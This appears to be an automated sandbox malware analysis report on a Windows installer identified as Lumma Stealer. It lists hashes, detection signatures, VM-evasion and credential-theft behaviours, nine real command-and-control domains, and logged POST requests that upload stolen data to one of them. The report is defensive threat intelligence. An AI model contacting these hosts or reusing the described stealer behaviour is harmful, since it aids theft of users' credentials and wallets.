Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1589443
MD5: 7a7570c5afc5bf3d53854f4ae9e61457
SHA1: f58e3ef793b096e088438eb4df373294bf95c09b
SHA256: 3ab888d4b341b936543bb6d48504a4530c27466c4a40b0705ef3dba5a5326b6d
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Set-up.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 7A7570C5AFC5BF3D53854F4AE9E61457)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration:
{"C2 url": ["spookycappy.biz", "fraggielek.biz", "grandiouseziu.biz", "marketlumpe.biz", "nuttyshopr.biz", "littlenotii.biz", "rampnatleadk.click", "punishzement.biz", "truculengisau.biz"], "Build id": "error--end"}
Yara matches

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x50f3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1840272460.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Set-up.exe PID: 7104 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Set-up.exe PID: 7104 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

No Sigma rule has matched
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-12T15:20:13.124090+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:14.615838+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:15.818900+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:17.106777+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:18.280695+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:21.757785+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:23.442162+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:26.618370+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:14.149231+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:15.116755+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:27.974091+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:14.149231+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:15.116755+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 172.67.139.144 | 443 | TCP
2025-01-12T15:20:17.580047+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 172.67.139.144 | 443 | TCP


AV Detection

Source: marketlumpe.biz | Avira URL Cloud: Label: malware
Source: nuttyshopr.biz | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/(8Y | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/apil7 | Avira URL Cloud: Label: malware
Source: grandiouseziu.biz | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/ | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/apiC8Yg | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/:3ODr | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/api | Avira URL Cloud: Label: malware
Source: littlenotii.biz | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/apiK | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/I8Xl | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click:443/api | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/9 | Avira URL Cloud: Label: malware
Source: rampnatleadk.click | Avira URL Cloud: Label: malware
Source: spookycappy.biz | Avira URL Cloud: Label: malware
Source: truculengisau.biz | Avira URL Cloud: Label: malware
Source: fraggielek.biz | Avira URL Cloud: Label: malware
Source: punishzement.biz | Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/apiz | Avira URL Cloud: Label: malware
Source: Set-up.exe.7104.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["spookycappy.biz", "fraggielek.biz", "grandiouseziu.biz", "marketlumpe.biz", "nuttyshopr.biz", "littlenotii.biz", "rampnatleadk.click", "punishzement.biz", "truculengisau.biz"], "Build id": "error--end"}
Source: Set-up.exe | Virustotal: Detection: 7%
Source: Set-up.exe | ReversingLabs: Detection: 13%
Source: Set-up.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49745 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.139.144:443
Source: Malware configuration extractor | URLs: spookycappy.biz
Source: Malware configuration extractor | URLs: fraggielek.biz
Source: Malware configuration extractor | URLs: grandiouseziu.biz
Source: Malware configuration extractor | URLs: marketlumpe.biz
Source: Malware configuration extractor | URLs: nuttyshopr.biz
Source: Malware configuration extractor | URLs: littlenotii.biz
Source: Malware configuration extractor | URLs: rampnatleadk.click
Source: Malware configuration extractor | URLs: punishzement.biz
Source: Malware configuration extractor | URLs: truculengisau.biz
Source: Joe Sandbox View | IP Address: 172.67.139.144
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.139.144:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.139.144:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: rampnatleadk.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 49 | Host: rampnatleadk.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3XEH7KGCEF7JX | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18135 | Host: rampnatleadk.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=FISV8E7XM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8732 | Host: rampnatleadk.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LN94D6SCN5NTA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20409 | Host: rampnatleadk.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=57E1C7PTPJW6B8194RN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1409 | Host: rampnatleadk.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KVHPB4STMIJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 549671 | Host: rampnatleadk.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 84 | Host: rampnatleadk.click
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: rampnatleadk.click
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: rampnatleadk.click
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Set-up.exe, 00000000.00000002.1910542741.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Set-up.exe | String found in binary or memory: http://gcc.gnu.org/bugs.html):
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1910542741.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/
Source: Set-up.exe, 00000000.00000002.1910542741.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/(8Y
Source: Set-up.exe, 00000000.00000003.1835478387.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1834001627.0000000003F06000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805472670.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805998934.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1833979280.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806263294.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/9
Source: Set-up.exe, 00000000.00000002.1910795263.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/:3ODr
Source: Set-up.exe, 00000000.00000002.1910795263.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/I8Xl
Source: Set-up.exe, 00000000.00000003.1852213854.0000000000DE2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806237333.0000000003F10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/api
Source: Set-up.exe, 00000000.00000003.1833921663.0000000003F0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/apiC8Yg
Source: Set-up.exe, 00000000.00000003.1794559739.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/apiK
Source: Set-up.exe, 00000000.00000003.1841233829.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864166986.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1857255847.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/apil7
Source: Set-up.exe, 00000000.00000003.1833921663.0000000003F0A000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806991177.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805384068.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851850249.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805882594.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864327284.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1909389621.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1911159958.0000000003F12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1840080903.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806237333.0000000003F10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click/apiz
Source: Set-up.exe, 00000000.00000003.1805472670.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864394306.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rampnatleadk.click:443/api
Source: Set-up.exe, 00000000.00000003.1782712260.0000000003F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Set-up.exe, 00000000.00000003.1794627775.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782851723.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1783081057.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782712260.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1794468638.0000000003F59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Set-up.exe, 00000000.00000003.1782851723.0000000003F34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Set-up.exe, 00000000.00000003.1794627775.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782851723.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1783081057.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782712260.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1794468638.0000000003F59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Set-up.exe, 00000000.00000003.1782851723.0000000003F34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe | String found in binary or memory: https://www.freetype.org/ttfautohint
Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49733 version: TLS 1.2
